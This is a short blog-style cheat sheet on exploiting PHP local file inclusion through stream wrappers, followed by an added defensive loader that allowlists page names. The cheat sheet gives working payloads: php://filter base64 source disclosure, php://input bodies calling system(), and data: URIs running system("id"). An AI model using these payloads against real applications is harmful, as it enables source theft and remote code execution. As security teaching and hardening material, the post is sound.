Exploit LFI with PHP Protocols / Wrappers
2017. 11. 1. 21:16
This post draws heavily on the material here.
file://
- controllable function : x
- allow_url_include : Off
- vulnerability type : LFI / File Manipulation
glob://
- controllable function : x
- allow_url_include : Off
- vulnerability type : Directory Traversal
php://filter/read
- controllable function : include
- allow_url_include : Off
- vulnerability type : File Disclosure
php://filter/read=convert.base64-encode/resource=index.php
php://filter/write
- controllable function : file_put_contents
- allow_url_include : Off
- vulnerability type : Encoding
file_put_contents("php://filter/write=string.rot13/resource=x.txt","content");
php://input
- controllable function : include
- allow_url_include : On
- vulnerability type : RCE
<?php echo base64_encode(file_get_contents("solution.php"));?>
<?php system('cat x.php');?>
data://
- controllable function : include
- allow_url_include : On
- vulnerability type : RCE
data:text/plain,<?php system("id")?>
data:text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpPz4=
zip://
- controllable function : include + uploaded file
- allow_url_include : Off
- vulnerability type : RCE
zip://<Absolute path>
phar://
- controllable function : include + uploaded file
- allow_url_include : Off
- vulnerability type : RCE
PHP Version >= 5.3
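
The entries above list php://filter, zip:// and phar:// as working with allow_url_include Off, so that setting alone does not protect an include that takes user input. The following is an added example, not code from the original post: a page loader that accepts only allowlisted names and confirms containment with realpath(). The function name resolve_page() and the temporary directory layout are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example; resolve_page() and the directory layout are hypothetical.
// Maps a user-supplied page name to a file under $baseDir, or returns null.
function resolve_page(string $baseDir, string $name): ?string
{
    // Allowlist the shape of the name: no ':', '/', '.', or '%', so no
    // wrapper scheme (php://, data:, zip://, phar://, glob://, file://)
    // and no traversal sequence can be expressed at all.
    if (preg_match('/\A[a-z0-9_-]{1,32}\z/', $name) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null; // directory or page does not exist
    }
    // Containment check after symlinks have been resolved.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary pages directory with one legitimate page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home';\n");

// Inputs: one valid name, then wrapper strings as they appear on this page.
$inputs = [
    'home',
    'php://filter/read=convert.base64-encode/resource=index.php',
    'php://input',
    'data:text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpPz4=',
    'zip://<Absolute path>',
    'phar://',
    '../home',
];
foreach ($inputs as $in) {
    $resolved = resolve_page($dir, $in);
    printf("%-60s %s\n", $in, $resolved === null ? 'rejected' : 'include ' . basename($resolved));
}

unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```

Only `home` resolves to a path; every other input is rejected by the name allowlist before any filesystem or stream function sees it.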